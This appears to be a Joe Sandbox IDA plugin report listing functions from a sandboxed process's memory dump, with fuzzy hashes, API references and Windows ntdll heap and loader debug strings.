Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction ID: 3b5084d5299d8eb438055bc316156569d031c7ce94a77183540575ef25cdfd14
Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 342BA1F0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 285timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 342BA25D
RtlDebugPrintTimes.NTDLL ref: 342BA2F1
RtlDebugPrintTimes.NTDLL ref: 342BA314
RtlDebugPrintTimes.NTDLL ref: 342BA340
RtlDebugPrintTimes.NTDLL ref: 342BA415
RtlDebugPrintTimes.NTDLL ref: 342BA468
RtlDebugPrintTimes.NTDLL ref: 342BA487
RtlDebugPrintTimes.NTDLL ref: 342BA4B8

Strings

HEAP: , xrefs: 342BA206

Memory Dump Source

Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true

Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd

Similarity

API ID: DebugPrintTimes
String ID: HEAP:
API String ID: 3446177414-2466845122
Opcode ID: d2afad35d703109c9766bd2e4edd14994ba560cbb24bc5f6ef43324c30fde0d5
Instruction ID: 287f1c9f95814f6a16f243bb6a1f3e1b11b4c5f771f1fa22caa70e4b3da5700d
Opcode Fuzzy Hash: d2afad35d703109c9766bd2e4edd14994ba560cbb24bc5f6ef43324c30fde0d5
Instruction Fuzzy Hash: C9A18D75B143128FDB04CE18C894A1ABBEAFF88390F06456DE985EB310EB71EC45CB91

Uniqueness

Uniqueness Score: -1.00%

Function 34217550 Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 194COMMON

Download Yara Rule

Strings

CLIENT(ntdll): Processing section info %ws..., xrefs: 34254592
CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 34254460
CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 34254530
ExecuteOptions, xrefs: 342544AB
CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 34254507
Execute=1, xrefs: 3425451E
CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 3425454D

Memory Dump Source

Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true

Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd

Similarity

API ID:
String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 0-484625025
Opcode ID: 27b9976d294754d09b15a7f08ed49aaacc9287d93e478a8d3536e07961f8e474
Instruction ID: 7102f7553f5ee6c9f5d1ae44528e0f9ae52eb74c93cf6e59c9a0d1cac04f7bbf
Opcode Fuzzy Hash: 27b9976d294754d09b15a7f08ed49aaacc9287d93e478a8d3536e07961f8e474
Instruction Fuzzy Hash: 19511671A00719BEFB109A94DC84FA9B3EDEF98384F4004E9E906B7180EB709E45CE50

Uniqueness

Uniqueness Score: -1.00%

Function 341FA170 Relevance: 12.7, APIs: 1, Strings: 6, Instructions: 404COMMON

Download Yara Rule

Strings

RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section, xrefs: 342478F3
SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 342477E2
RtlpFindActivationContextSection_CheckParameters, xrefs: 342477DD, 34247802
SsHd, xrefs: 341FA304
Actx , xrefs: 34247819, 34247880
SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 34247807

Memory Dump Source

Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true

Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd

Similarity

API ID:
String ID: Actx $RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
API String ID: 0-1988757188
Opcode ID: 7fcbd079e99451afc873fd9bc7633bf86df7962bfcac0cce7ab979759fb3305b
Instruction ID: 6a892a7ef7002ea8831924977842d558a6d8e96fcc50a6c629a86efc91550467
Opcode Fuzzy Hash: 7fcbd079e99451afc873fd9bc7633bf86df7962bfcac0cce7ab979759fb3305b
Instruction Fuzzy Hash: 11E1CE74608B028FE714CE24C8D071A77E5EB847A4F514B6DE865DB290D73AD846CB82

Uniqueness

Uniqueness Score: -1.00%

Function 341FD690 Relevance: 12.6, APIs: 1, Strings: 6, Instructions: 372timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 34249299

Strings

RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section, xrefs: 34249372
SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 34249153
RtlpFindActivationContextSection_CheckParameters, xrefs: 3424914E, 34249173
GsHd, xrefs: 341FD794
Actx , xrefs: 34249315
SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 34249178

Memory Dump Source

Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true

Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd

Similarity

API ID: DebugPrintTimes
String ID: Actx $GsHd$RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
API String ID: 3446177414-2196497285
Opcode ID: e4329d944764d6befae46908ca1db8b191ec60987b5aa874b828df99edeff448
Instruction ID: 51f81f84506921947fbcfc4a3fe274f4f5531fabca2d9fdb06359310dbc5213f
Opcode Fuzzy Hash: e4329d944764d6befae46908ca1db8b191ec60987b5aa874b828df99edeff448
Instruction Fuzzy Hash: FAE1BF746087028FE704CF25C8C0B5AB7E5FB89358F404A6DE8969B291D772E846CF92

Uniqueness

Uniqueness Score: -1.00%

Function 3425FA02 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 109timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 3425FAF3
RtlDebugPrintTimes.NTDLL ref: 3425FB15

Strings

Failed to find export %s!%s (Ordinal:%d) in "%wZ" 0x%08lx, xrefs: 3425FA58
$, xrefs: 3425FABD
LdrpRedirectDelayloadFailure, xrefs: 3425FA5E
minkernel\ntdll\ldrdload.c, xrefs: 3425FA68
Unknown, xrefs: 3425FA42, 3425FA54

Memory Dump Source

Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true

Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd

Similarity

API ID: DebugPrintTimes
String ID: $$Failed to find export %s!%s (Ordinal:%d) in "%wZ" 0x%08lx$LdrpRedirectDelayloadFailure$Unknown$minkernel\ntdll\ldrdload.c
API String ID: 3446177414-4227709934
Opcode ID: 37bf179e924b99fff81b7473317e13487bdf3f6babb161e1ce0bf21ece5fca2d
Instruction ID: b38d0f54ca903ee9d82990aea14e44856db075b7517b111361859bda237bed63
Opcode Fuzzy Hash: 37bf179e924b99fff81b7473317e13487bdf3f6babb161e1ce0bf21ece5fca2d
Instruction Fuzzy Hash: 88414BB9E0120AABDB01CF99C994AEEBBB9FF48354F1100A9E914B7350D7719E01CF90

Uniqueness

Uniqueness Score: -1.00%

Function 3428F8F8 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 190timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 3428F92E

Strings

HEAP: , xrefs: 3428F9F9, 3428FAE4
HEAP[%wZ]: , xrefs: 3428F9EC, 3428FAD7
About to free block at %p with tag %ws, xrefs: 3428FAFE
About to free block at %p, xrefs: 3428FA0A
RtlFreeHeap, xrefs: 3428F948, 3428F9B2

Memory Dump Source

Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true

Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd

Similarity

API ID: DebugPrintTimes
String ID: About to free block at %p$About to free block at %p with tag %ws$HEAP: $HEAP[%wZ]: $RtlFreeHeap
API String ID: 3446177414-3492000579
Opcode ID: 2b45034bfee3d55b07af5806d7a7a97f82a80fcc9aacc71f295c1bcd0ac46f5a
Instruction ID: c980796d1ba80256b18dd0a066cf712b6bf2f8d59b1d1004c026260f3c16b2b5
Opcode Fuzzy Hash: 2b45034bfee3d55b07af5806d7a7a97f82a80fcc9aacc71f295c1bcd0ac46f5a
Instruction Fuzzy Hash: 7E71EF75A11A85DFEB01CF68C4906ADFBF2FF8A354F058099E485BB291CB319941CB54

Uniqueness

Uniqueness Score: -1.00%

Function 341D6565 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 184timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 341D6614
RtlDebugPrintTimes.NTDLL ref: 341D665F

Strings

LdrpLoadShimEngine, xrefs: 3423984A, 3423988B
Loading the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 34239843
Initializing the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 34239885
minkernel\ntdll\ldrinit.c, xrefs: 34239854, 34239895

Memory Dump Source

Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true

Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd

Similarity

API ID: DebugPrintTimes
String ID: Initializing the shim DLL "%wZ" failed with status 0x%08lx$LdrpLoadShimEngine$Loading the shim DLL "%wZ" failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
API String ID: 3446177414-3589223738
Opcode ID: 79384d17b8ce9a92d15788a04135332208c4e37eec920053335a649151fd09ca
Instruction ID: 418d55b9a74cf829c154bb9594afe6919791acb3dda64a2c3410ad4667e31812
Opcode Fuzzy Hash: 79384d17b8ce9a92d15788a04135332208c4e37eec920053335a649151fd09ca
Instruction Fuzzy Hash: 8F51F5B5E107549FEB04EBACCC98EAD7BB6EB56304F040159E451BB2A5CB709C41CF94

Uniqueness

Uniqueness Score: -1.00%

Function 3420DA20 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 133timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 3424F41B

Strings

Invalid heap signature for heap at %p, xrefs: 3424F45D
HEAP: , xrefs: 3424F451
RtlUnlockHeap, xrefs: 3424F467
HEAP[%wZ]: , xrefs: 3424F444
, passed to %s, xrefs: 3424F46C

Memory Dump Source

Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true

Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd

Similarity

API ID: DebugPrintTimes
String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlUnlockHeap
API String ID: 3446177414-3224558752
Opcode ID: ed55d1f108cd311d2e23866610836055173b38e945eb033516dc471445921bf8
Instruction ID: 8afcc153d5f32e3bbc32b736ecc9cff026d1c4895818ea5f7aa1418b791c3e20
Opcode Fuzzy Hash: ed55d1f108cd311d2e23866610836055173b38e945eb033516dc471445921bf8
Instruction Fuzzy Hash: 91416775A25B42DFE705CF68C884B6AB7E5EF81364F0185ADE51677381CB38A980CF90

Uniqueness

Uniqueness Score: -1.00%

Function 3428ECD7 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 128timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 3428EDD0
RtlDebugPrintTimes.NTDLL ref: 3428EE45

Strings

HEAP: , xrefs: 3428ECDD
---------------------------------------, xrefs: 3428EDF9
Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information, xrefs: 3428EDE3
Entry Heap Size , xrefs: 3428EDED

Memory Dump Source

Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true

Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd

Similarity

API ID: DebugPrintTimes
String ID: ---------------------------------------$Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information$Entry Heap Size $HEAP:
API String ID: 3446177414-1102453626
Opcode ID: 85bfbd4287041feb72bf8d9db904ef72744a69fe07ec31bd519485b9b28d4193
Instruction ID: f6c352f74be819938b3f5b0df670466bd21f0c80a140e488bbf50fa917caf941
Opcode Fuzzy Hash: 85bfbd4287041feb72bf8d9db904ef72744a69fe07ec31bd519485b9b28d4193
Instruction Fuzzy Hash: 8C418D79E00216DFD704DF18C48895EBBAAFF4A39472580ADD425FB2A1C731EC42CB91

Uniqueness

Uniqueness Score: -1.00%

Function 3420DAC0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 84timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 3424F561

Strings

Invalid heap signature for heap at %p, xrefs: 3424F5A3
HEAP: , xrefs: 3424F597
HEAP[%wZ]: , xrefs: 3424F58A
RtlLockHeap, xrefs: 3424F5AD
, passed to %s, xrefs: 3424F5B2

Memory Dump Source

Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true

Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd

Similarity

API ID: DebugPrintTimes
String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlLockHeap
API String ID: 3446177414-1222099010
Opcode ID: 733cd74612afe5248ab30cc7b9fa7c4c12d765bb6657a749253ebe69d073eb87
Instruction ID: 159dfe2a9422d30a39137efccc57d1aafb15fb44a1ae266ca907879736ada660
Opcode Fuzzy Hash: 733cd74612afe5248ab30cc7b9fa7c4c12d765bb6657a749253ebe69d073eb87
Instruction Fuzzy Hash: 01315575621F84DFF716CB28C888B6A77E9EF02690F014489E45277791CB65E940CE15

Uniqueness

Uniqueness Score: -1.00%

Function 341E9046 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 199timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 34242360

Strings

$, xrefs: 341E90B1
@, xrefs: 341E9095

Memory Dump Source

Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true

Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd

Similarity

API ID: DebugPrintTimes
String ID: $$@
API String ID: 3446177414-1194432280
Opcode ID: 176b36e7dc4481cb4528c6a77ccb8eef43f7dff735ed5210346a7c9f378b7658
Instruction ID: 01ffa96cc53f40adb139f481c614cb5a671c09a32d2f66f4b082c1dad2a643f1
Opcode Fuzzy Hash: 176b36e7dc4481cb4528c6a77ccb8eef43f7dff735ed5210346a7c9f378b7658
Instruction Fuzzy Hash: 7F8129B5D006699BEB25CB54CC84BEEB7B8EB08750F0041EAA919B7250D7709E85CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 34214C3D Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 117timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 34214C84

Strings

LdrpFindDllActivationContext, xrefs: 34253440, 3425346C
Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 34253439
minkernel\ntdll\ldrsnap.c, xrefs: 3425344A, 34253476
Querying the active activation context failed with status 0x%08lx, xrefs: 34253466

Memory Dump Source

Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true

Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd

Similarity

API ID: DebugPrintTimes
String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
API String ID: 3446177414-3779518884
Opcode ID: f43132fd53b48da03b986a4abf87df3d3a2e6bf4bf5d17d299452a71c441627d
Instruction ID: b1b2a239c716041a0ee5a79b2ca5f524dbd8135a96bc73cdf6f326ae88fe0a02
Opcode Fuzzy Hash: f43132fd53b48da03b986a4abf87df3d3a2e6bf4bf5d17d299452a71c441627d
Instruction Fuzzy Hash: 6531D7B6E007D3AFFB219B48C889F56B6E4EF113D4F42836AD80C77150D7609D80C695

Uniqueness

Uniqueness Score: -1.00%

Function 3420237A Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 111COMMON

Download Yara Rule

Strings

LdrpDynamicShimModule, xrefs: 3424A7A5
minkernel\ntdll\ldrinit.c, xrefs: 3424A7AF
Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 3424A79F
apphelp.dll, xrefs: 34202382

Memory Dump Source

Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true

Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd

Similarity

API ID:
String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
API String ID: 0-176724104
Opcode ID: b567b5b73a0ed45efaa73e9a21e9d1bf292affeead90ab576d080ba5794c9826
Instruction ID: 18d39d5940f51a9f71c0fb2449b0ef87eb600b02665d218b04a548137e12eac4
Opcode Fuzzy Hash: b567b5b73a0ed45efaa73e9a21e9d1bf292affeead90ab576d080ba5794c9826
Instruction Fuzzy Hash: DC310376E00601EFF7189F1DC889E5EBBB6EB85750F1540AAE911B7350DA709C82CF90

Uniqueness

Uniqueness Score: -1.00%

Function 341DF8B0 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 263timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 3423E51F

Strings

HEAP: , xrefs: 3423E49D
HEAP[%wZ]: , xrefs: 3423E490
(HeapHandle != NULL), xrefs: 3423E4A8

Memory Dump Source

Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true

Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd

Similarity

API ID: DebugPrintTimes
String ID: (HeapHandle != NULL)$HEAP: $HEAP[%wZ]:
API String ID: 3446177414-3610490719
Opcode ID: 8a2fcdd8842d0146bd9b132bd641049b6d970da565687735259c6d80cbdfd862
Instruction ID: 7b25decc1e408cc22be5b127ba66320c86fb01dbde3c6a6f4a843fec9055728b
Opcode Fuzzy Hash: 8a2fcdd8842d0146bd9b132bd641049b6d970da565687735259c6d80cbdfd862
Instruction Fuzzy Hash: C89127F1705B41EFE319CB24C8D0B3AB7AAFF46684F010559F845AB285DB34E945CB92

Uniqueness

Uniqueness Score: -1.00%

Function 34200AEB Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 210timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 34200BFC

Strings

Failed to allocated memory for shimmed module list, xrefs: 34249F1C
minkernel\ntdll\ldrinit.c, xrefs: 34249F2E
LdrpCheckModule, xrefs: 34249F24

Memory Dump Source

Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true

Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd

Similarity

API ID: DebugPrintTimes
String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
API String ID: 3446177414-161242083
Opcode ID: b5bfbb5fc571164115768ed1c0d846020e45991b8d3314ed2deb6f6b95a04279
Instruction ID: a08b5adad5f6334186d38ec5a9183b3edea80ffa40979dfeec702b3837d1dbaf
Opcode Fuzzy Hash: b5bfbb5fc571164115768ed1c0d846020e45991b8d3314ed2deb6f6b95a04279
Instruction Fuzzy Hash: 7C71AD75E00606DFEB08DF69C884BAEBBF5EB44248F14846DE816F7250E774AA42CF54

Uniqueness

Uniqueness Score: -1.00%

Function 342643D5 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 34264489

Strings

LdrpCheckRedirection, xrefs: 3426450F
Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 34264508
minkernel\ntdll\ldrredirect.c, xrefs: 34264519

Memory Dump Source

Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true

Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd

Similarity

API ID: DebugPrintTimes
String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
API String ID: 3446177414-3154609507
Opcode ID: b5669050a17523ea482a3541c80d499f0ddee4cd1f7c3721a6ed9b09f8b682b4
Instruction ID: d6bbbf3e1e54014336ce74210c7a56325d59d89c89bb62f44fbd1d9f465087d9
Opcode Fuzzy Hash: b5669050a17523ea482a3541c80d499f0ddee4cd1f7c3721a6ed9b09f8b682b4
Instruction Fuzzy Hash: 6B411D76A00312CFDB00CF58C881A0277E9EF4969CF05069DECDAB7225D7B8D880CB99

Uniqueness

Uniqueness Score: -1.00%

Function 34265B90 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 34265C0F
RtlDebugPrintTimes.NTDLL ref: 34265C31
RtlDebugPrintTimes.NTDLL ref: 34265C3E

Strings

Wow64 Emulation Layer, xrefs: 34265C09

Memory Dump Source

Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true

Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd

Similarity

API ID: DebugPrintTimes
String ID: Wow64 Emulation Layer
API String ID: 3446177414-921169906
Opcode ID: 7d3ecb1305bd98427ad94e4f2dab85b862ebe48e069a89f184f47ee8b0e1ce50
Instruction ID: 15524c96f5aa71bd5d0c21ae0a497b29b390e7ca9b03fc6719f1e2852b85df11
Opcode Fuzzy Hash: 7d3ecb1305bd98427ad94e4f2dab85b862ebe48e069a89f184f47ee8b0e1ce50
Instruction Fuzzy Hash: 1521477690055EBFAF019AA0CD88CFFBB7DEF45299B040154FA16B2104E734DE42EB64

Uniqueness

Uniqueness Score: -1.00%

Function 3420EE48 Relevance: 6.3, APIs: 4, Instructions: 347COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true

Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 526c64e954d0f0af7c7fded82fc49164c7e777c54e996c7a27007a95506472c3
Instruction ID: 16448834b67110f5089952b0850e513e87795e395bb5ec3408b6fb9d27ddb687
Opcode Fuzzy Hash: 526c64e954d0f0af7c7fded82fc49164c7e777c54e996c7a27007a95506472c3
Instruction Fuzzy Hash: 6DE1DC74E00709CFEB25CFA9C984A9DBBF6FB48310F11852AE555B7264DBB1A881CF10

Uniqueness

Uniqueness Score: -1.00%

Function 3425EBD0 Relevance: 6.2, APIs: 4, Instructions: 187timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 3425EC61
RtlDebugPrintTimes.NTDLL ref: 3425EC89
RtlDebugPrintTimes.NTDLL ref: 3425ED2C
RtlDebugPrintTimes.NTDLL ref: 3425EDE0

Memory Dump Source

Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true

Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 76b51d963e76a84d3595092a02404b212d7f1551aabcdf7f5d74ec5ada8c1725
Instruction ID: f5051a9638807413e2a3675f6353b0ac6a5a41ca5ed438806e5f27fa2a058d1c
